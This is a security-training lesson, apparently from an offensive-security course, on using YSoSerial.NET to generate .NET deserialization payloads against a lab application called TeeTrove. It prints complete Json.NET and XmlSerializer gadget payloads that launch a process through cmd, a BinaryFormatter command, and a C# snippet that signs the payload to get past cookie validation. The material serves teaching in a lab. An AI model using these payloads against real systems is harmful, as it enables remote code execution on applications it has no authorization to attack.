Automating Exploitation with YSoSerial.NET

Introduction

In the previous 5 sections, we manually took apart two .NET Framework deserialization gadgets and developed three exploits against deserialization vulnerabilities in TeeTrove. Although complicated, it is important to understand how to perform such attacks manually before using tools to automate the process, because the tools may not always work correctly, or there may be extra conditions that the tool can not handle such as the Tee root element in the 2nd vulnerability.

In this section, let's take a look at how we can use the tool YSoSerial.NET to (semi-)automatically generate similar payloads that we can use for exploitation.

YSoSerial.NET

YSoSerial.NET is an open-source tool that can be used to generate payloads for .NET deserialization vulnerabilities. It was created by Alvaro Muñoz who you may remember as one of the authors of the Friday the 13th JSON Attacks talk at BlackHat 2017.

Usage is fairly straightforward. We can download the latest version from the Releases page, and simply extract the ZIP file after it is downloaded. The syntax is explained in the repository's README.md file, however, the most important arguments are:

• -f to specify the Formatter, e.g. Json.NET, XmlSerializer, BinaryFormatter
• -g to specify the Gadget, e.g. ObjectDataProvider, TypeConfuseDelegate
• -c to specify the Command, e.g. calc
• -o to specify the Output mode, e.g. Base64 or Raw for plaintext

.\ysoserial.exe -f [Formatter] -g [Gadget] -c [Command] -o [Output]

YSoSerial.NET provides support for many more gadgets and formatters than the few we covered in this module, however, they all work similarly. We will not be covering any others, but if you are interested in learning more on your own time, YSoSerial.NET is open source, and there are many blog posts/white papers by researchers that detail the various technicalities.

Example 1: JSON, Remember Me Cookie

Let's take a look at how we could generate a payload for the first vulnerability we exploited; the "Remember Me" cookie which was (de)serialized using Json.NET. We will pass:

• Json.Net as the Formatter (-f)
• ObjectDataProvider as the Gadget (-g)
• notepad and the Command (-c)
• Raw as the Output (-o) so that we get plaintext JSON

All together, the command looks like this:

PS C:\htb> .\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "notepad" -o Raw

Running the command, the output we get looks very similar to the payload we developed manually:

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c notepad']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

If we copy-paste the payload it gave us into the TTREMEMBER cookie and log out of TeeTrove, then we see that a notepad.exe process is spawned as expected.

Example 2: XML, Tee Import Feature

Let's look at how we could use YSoSerial.NET to generate a payload for the second vulnerability; the Tee Import feature which took a serialized XML string as input to XmlSerializer.

The command remains the same, changing only the selected formatter from Json.Net to XmlSerializer:

PS C:\htb> .\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "notepad" -o Raw

The output YSoSerial.NET gives us is similar to the payload we developed with the main difference being the XAML string passed to XamlReader.Parse is wrapped inside a ResourceDictionary whereas our payload passed a string:

<?xml version="1.0"?>
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
    <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
        <ExpandedElement/>
        <ProjectedProperty0>
            <MethodName>Parse</MethodName>
            <MethodParameters>
                <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
                    <![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:d="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:b="clr-namespace:System;assembly=mscorlib" xmlns:c="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider d:Key="" ObjectType="{d:Type c:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><b:String>cmd</b:String><b:String>/c notepad</b:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
                </anyType>
            </MethodParameters>
            <ObjectInstance xsi:type="XamlReader"></ObjectInstance>
        </ProjectedProperty0>
    </ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>

This time, however, we can't just copy-paste the payload. If you remember from a previous section, the type needed to be specified, and the ExpandedWrapperOfXaml<SNIP> node needed to be renamed to Tee. Once we make the changes, the payload does work as intended, resulting in a notepad.exe process spawning, but this highlights the importance of understanding how the attack works so that we can adapt payloads to work in the specific scenarios we come across:

Example 3: Binary, Authentication Cookie

For the last example, let's take a look at using YSoSerial.NET to exploit the authentication cookie, which used BinaryFormatter for (de-)serialization.

Generating a payload for BinaryFormatter is as simple as running the following command:

PS C:\htb> .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'notepad' -o base64

However, as you should expect, this payload will not work due to the cookie validation that goes on before deserialization. Once again this payload will need to be modified to work with TeeTrove, but this is not very difficult when we have the decompiled source code to aid us in development:

private static readonly string AUTH_COOKIE_SECRET = "916344<SNIP>";

private static string createSHA256HashB64(string session_b64)
{
    <SNIP>
}

static void Main(string[] args)
{
    string ysoserial_payload_b64 = "AAEAAAD/////AQAAAAAAA<SNIP>";
    string authCookieVal = ysoserial_payload_b64 + "." + createSHA256HashB64(ysoserial_payload_b64);
    Console.WriteLine(authCookieVal);
}

With this short program to turn the YSoSerial.NET payload into a usable payload for TeeTrove, exploitation works as expected, but once again this is an example of why it is important to understand how to do things manually in case the automated tools can not do exactly what we want.